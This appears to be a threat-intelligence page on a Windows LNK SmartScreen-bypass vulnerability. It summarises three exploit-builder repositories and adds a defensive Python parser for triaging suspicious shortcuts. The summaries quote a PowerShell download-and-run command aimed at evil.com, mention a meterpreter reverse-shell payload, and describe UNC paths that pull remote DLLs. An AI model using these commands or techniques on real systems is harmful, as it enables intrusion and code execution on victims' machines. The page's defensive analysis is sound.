Windows Shell SmartScreen and Security Prompt Bypass via Malicious LNK/Link
CVE-2026-21510 is a Windows Shell protection mechanism failure / security feature bypass vulnerability in Microsoft Windows. The issue allows attacker-controlled content delivered via a malicious link or Windows shortcut (LNK) file to bypass Windows Defender SmartScreen and Windows Shell security prompts. Multiple sources describe exploitation through specially crafted LNK content and Windows Shell namespace parsing, where attacker-controlled remote content is invoked without the normal warning and consent flow. In observed campaigns, the flaw was used in phishing-driven attack chains and could be combined with other vulnerabilities such as CVE-2026-21513 or CVE-2026-21509. The vulnerability was actively exploited in the wild as a zero-day and was added to CISA's KEV catalog.
Exploits
3 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos (1 hidden).
The repository is a small standalone Python exploit generator consisting primarily of one large script, lnkstomperpoint.py, plus a README and .gitignore. The script is not a scanner or detector; it is an offensive utility that programmatically builds crafted Windows .lnk files purportedly targeting CVE-2026-21510, a Windows Shell Link remote code execution issue. Based on the visible code and README, its core purpose is to generate malicious shortcut files with an attacker-controlled target executable, arguments, working directory, and multiple Shell Link ExtraData structures. Main capabilities described and partially evidenced in code include: LNK stomping variants, manipulation of Shell Link flags and CLSIDs, KnownFolder and PropertyStore data block generation, environment variable blocks, argument obfuscation, optional embedded payload handling, AES encryption support via pycryptodome, anti-forensics options, randomized metadata/CLSID/KnownFolder values, and generation of multiple variants for signature evasion. The script imports AES, padding, random byte generation, struct handling, and logging, indicating real implementation effort rather than a placeholder. Logging is configured to write to cve_2026_21510_ultimate_absolute.log. The visible tail of the script shows a CLI workflow that instantiates an exploit object with many offensive options and writes a generated .lnk file. The README documents extensive CLI options such as --target, --args, --output, --working-dir, --embed-payload, --encrypt-payload, --anti-forensics, --randomize-clsid, --randomize-known-folder, --obfuscate-arguments, and --generate-variants. Example usage demonstrates launching cmd.exe with /c calc.exe, embedding a payload file, and using powershell.exe with a Net.WebClient DownloadString call to retrieve a remote script from http://evil.com/shellcode.ps1. That example introduces a clear web/network-capable second stage, although the generator itself mainly produces a file-based initial vector.
Overall, this repository is a standalone operational exploit builder for malicious Windows shortcut generation. Its structure is simple, but the single Python file appears feature-rich and focused on producing obfuscated, evasive .lnk payloads for execution on Windows targets.
This repository is a small exploit-builder project with 4 files: a license, a README, and two Python scripts. It is not a scanner or detector; it generates malicious artifacts for a document-based exploit chain targeting CVE-2026-21514 and CVE-2026-21510.
Structure and purpose:
- README.md documents the intended exploit chain and experimentation notes. It describes a Protected View/SBX bypass component and an RCE component, including CLSID changes, XML/object changes, and possible DLL-to-CPL substitution.
- gen_rtf.py builds exploit.rtf by inserting a UTF-16-style null-padded UNC/WebDAV path into a large hardcoded RTF/OLE blob. The embedded path is \\127.0.0.1@80/final.lnk, indicating the document is meant to cause retrieval of a remote LNK over port 80 via WebDAV-like UNC syntax.
- make_lnk.py builds final.lnk from hardcoded hex templates plus a null-padded remote payload path. The referenced payload path is \\127.0.0.1\cc.dll. The script comments explicitly suggest generating the DLL with msfvenom using windows/meterpreter/reverse_tcp.
Main exploit capabilities:
- Generates a malicious RTF lure document.
- Embeds a remote UNC/WebDAV path to a malicious LNK file.
- Generates a malicious LNK that references a remote DLL payload over SMB/UNC.
- Includes embedded HTML/JavaScript/ActiveX logic inside the LNK data, apparently to trigger file/URL handling and object loading behavior.
- Supports straightforward operator customization by changing the hardcoded remote paths and replacing the DLL payload.
Operationally, this is an exploit builder rather than a full delivery framework. The payload is basic and hardcoded, so OPERATIONAL is the best fit rather than WEAPONIZED. The code is clearly intended to achieve code execution on a vulnerable Windows/Office target by chaining remote file retrieval and DLL loading.
The repository contains a single Python proof-of-concept script and a detailed README. The main file, CVE-2026-32202.py, is a research-oriented generator for crafted Windows .lnk files that reproduce the LinkTargetIDList structure associated with CVE-2026-21510 / CVE-2026-32202. The script reconstructs three shell items: (1) a Control Panel root CLSID item, (2) an 'All Control Panel Items' category item, and (3) a Unicode _IDCONTROLW structure containing a user-supplied module path, typically a UNC path to a remote .cpl file. It exposes CLI options for the embedded UNC/local path, output filename, applet ID, display name, infotip, and optional hex dump suppression. The exploit capability is file generation rather than direct network communication; however, the generated LNK is intended to cause Windows Explorer/shell32 to access the embedded UNC path during rendering, which can coerce outbound SMB authentication or a connection to an attacker-controlled share. The README provides reverse-engineering context, structure layouts, call-chain analysis, and explains that the vulnerable behavior occurs before later trust verification stages. Overall, this is a focused PoC/research tool for crafting malicious shortcut files to reproduce Windows shell path-resolution behavior, not a full weaponized framework or post-exploitation implant.
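The three repository summaries above share one detection-relevant trait: the shortcut's LinkTargetIDList or StringData carries a Control Panel shell namespace CLSID and/or a UNC path to a remote module, which is what makes the file fetch something off-host when the shell renders it. The following is an added triage example written for defenders; it is not code from any of the repositories or from Microsoft. It parses the public MS-SHLLINK layout (fixed header, LinkTargetIDList, LinkInfo skip, StringData), flags root-folder items whose CLSID is a well-known Control Panel value (the two CLSIDs are assumed from general Windows knowledge, not quoted from the page), and reports any UNC path or URL it finds. The sample shortcut it builds is a constructed fixture with a TEST-NET-2 address; it does not reproduce the _IDCONTROLW layout or any exploit file.

```python
import re
import struct
import uuid

# ShellLinkHeader.LinkFlags bits, from the public MS-SHLLINK specification.
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))
LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")
# Shell namespace CLSIDs that root a link target in the Control Panel.
# Assumed well-known Windows values; extend the table as your triage requires.
CONTROL_PANEL_CLSIDS = {
    uuid.UUID("21ec2020-3aea-1069-a2dd-08002b30309d"): "All Control Panel Items",
    uuid.UUID("26ee0668-a00a-44d7-9371-beb064c98683"): "Control Panel",
}
UNC_RE = re.compile(r"\\\\[\w.@\-]+[\\/][^\x00\"<>|\s]*")


def parse_lnk(data):
    """Return LinkFlags, the raw LinkTargetIDList items and the StringData fields."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a Shell Link: bad HeaderSize")
    if uuid.UUID(bytes_le=data[4:20]) != LNK_CLSID:
        raise ValueError("not a Shell Link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos, items = 0x4C, []
    if flags & HAS_LINK_TARGET_ID_LIST:
        idlist_size = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        end = pos + idlist_size                      # IDListSize includes the TerminalID
        while pos + 2 <= end:
            item_size = struct.unpack_from("<H", data, pos)[0]
            if item_size == 0:                       # TerminalID closes the list
                break
            items.append(data[pos + 2:pos + item_size])  # ItemID data without its size field
            pos += item_size
        pos = end
    if flags & HAS_LINK_INFO:                        # skip LinkInfo by its declared size
        pos += struct.unpack_from("<I", data, pos)[0]
    strings, width = {}, (2 if flags & IS_UNICODE else 1)
    for flag, name in STRING_FIELDS:                 # StringData: CountCharacters + chars
        if flags & flag:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            raw = data[pos:pos + count * width]
            strings[name] = raw.decode("utf-16-le" if width == 2 else "cp1252", errors="replace")
            pos += count * width
    return {"flags": flags, "items": items, "strings": strings}


def unc_paths_in_bytes(blob):
    """Find UNC paths encoded as UTF-16LE (either byte alignment) or as ANSI text."""
    found = set()
    for start in (0, 1):
        found.update(UNC_RE.findall(blob[start:].decode("utf-16-le", errors="ignore")))
    found.update(UNC_RE.findall(blob.decode("cp1252", errors="ignore")))
    return found


def triage_lnk(data):
    """Return human-readable findings an analyst should look at for one .lnk file."""
    lnk = parse_lnk(data)
    findings, unc = [], set()
    for item in lnk["items"]:
        # Root folder shell item: class byte 0x1F, sort-order byte, then a 16-byte CLSID.
        if len(item) >= 18 and item[0] == 0x1F:
            clsid = uuid.UUID(bytes_le=bytes(item[2:18]))
            if clsid in CONTROL_PANEL_CLSIDS:
                findings.append(f"IDList rooted in {CONTROL_PANEL_CLSIDS[clsid]} {{{clsid}}}")
        unc.update(unc_paths_in_bytes(item))       # catches module paths inside shell items
    for value in lnk["strings"].values():
        unc.update(UNC_RE.findall(value))
    findings.extend(f"remote UNC path referenced: {p}" for p in sorted(unc))
    args = lnk["strings"].get("arguments", "")
    if re.search(r"https?://", args, re.IGNORECASE):
        findings.append(f"arguments carry a URL: {args}")
    return findings


def build_sample_lnk(remote):
    """Constructed test fixture (synthetic; not a reproduction of any exploit file)."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I", 0x4C) + LNK_CLSID.bytes_le + struct.pack("<I", flags)
    header += b"\x00" * (0x4C - len(header))         # attributes, times and sizes zeroed
    if remote:
        root_clsid = uuid.UUID("21ec2020-3aea-1069-a2dd-08002b30309d")
        target = "\\\\198.51.100.7\\share\\demo.cpl"  # TEST-NET-2 address, constructed
        args = "/c start https://example.invalid/stage2"
    else:
        root_clsid = uuid.UUID("20d04fe0-3aea-1069-a2d8-08002b30309d")  # My Computer
        target = "C:\\Windows\\System32\\notepad.exe"
        args = "readme.txt"
    root_item = b"\x1f\x50" + root_clsid.bytes_le
    path_item = target.encode("utf-16-le") + b"\x00\x00"
    body = b"".join(struct.pack("<H", len(i) + 2) + i for i in (root_item, path_item))
    idlist = struct.pack("<H", len(body) + 2) + body + b"\x00\x00"   # body + TerminalID
    string_data = struct.pack("<H", len(args)) + args.encode("utf-16-le")
    return header + idlist + string_data
```

Run `triage_lnk(open(path, "rb").read())` over quarantined shortcuts; the benign fixture (`build_sample_lnk(remote=False)`) yields no findings, while the remote one reports the Control Panel CLSID, the UNC path and the URL in the arguments. The parser deliberately scans raw ItemID bytes rather than trusting a specific item layout, so a module path hidden in an unfamiliar shell item still surfaces.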
Recent activity
109 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A Windows shell protection mechanism failure used to bypass Windows Shell security controls as part of an exploit chain following initial code execution.
A Windows zero-day that allowed execution of a malicious LNK file without triggering a Microsoft Defender SmartScreen warning prompt. It was exploited by APT28 and later incompletely patched, leading to CVE-2026-32202.
A high-severity Windows SmartScreen and Shell prompt bypass vulnerability whose incomplete patch led to a related zero-click authentication coercion issue. It was exploited by APT28 using trojanized LNK files.